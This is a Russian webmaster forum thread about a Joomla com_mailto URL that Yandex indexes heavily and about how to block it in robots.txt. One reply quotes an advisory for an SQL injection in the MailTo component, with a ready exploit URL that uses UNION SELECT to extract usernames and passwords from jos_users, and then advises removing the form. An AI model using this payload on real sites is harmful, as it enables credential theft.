- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Сайт на джумле. Проггер, как сказал, при создании сайта закрыл все не нужные для индексации элементы. Сейчас в я.вебмастере сидит некий элемент, который занимает 40% от всей массы, подозреваю что он не нужен. Программист говорит что все хоккей. Элемент такой
index.php?option=com_mailto&tmpl=component&
Вредна ли эта штука и как ее закрыть от индексации?
Disallow: index.php?option=com_mailto&tmpl=component& или как-то по другому?
Сайт на джумле. Проггер, как сказал, при создании сайта закрыл все не нужные для индексации элементы. Сейчас в я.вебмастере сидит некий элемент, который занимает 40% от всей массы, подозреваю что он не нужен. Программист говорит что все хоккей. Элемент такой
index.php?option=com_mailto&tmpl=component&
Вредна ли эта штука и как ее закрыть от индексации?
Disallow: index.php?option=com_mailto&tmpl=component& или как-то по другому?
Программа: Joomla Component MailTo
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «article» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
/index.php?option=com_mailto&tmpl=mailto&article=[SQL]&Itemid=1
/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+ concat(username,char(58),password)KHG+from+jos_users--&Itemid=1
Вот такая вот фигня существует, я бы снес эту форму.
Написал ему, спасибо 🚬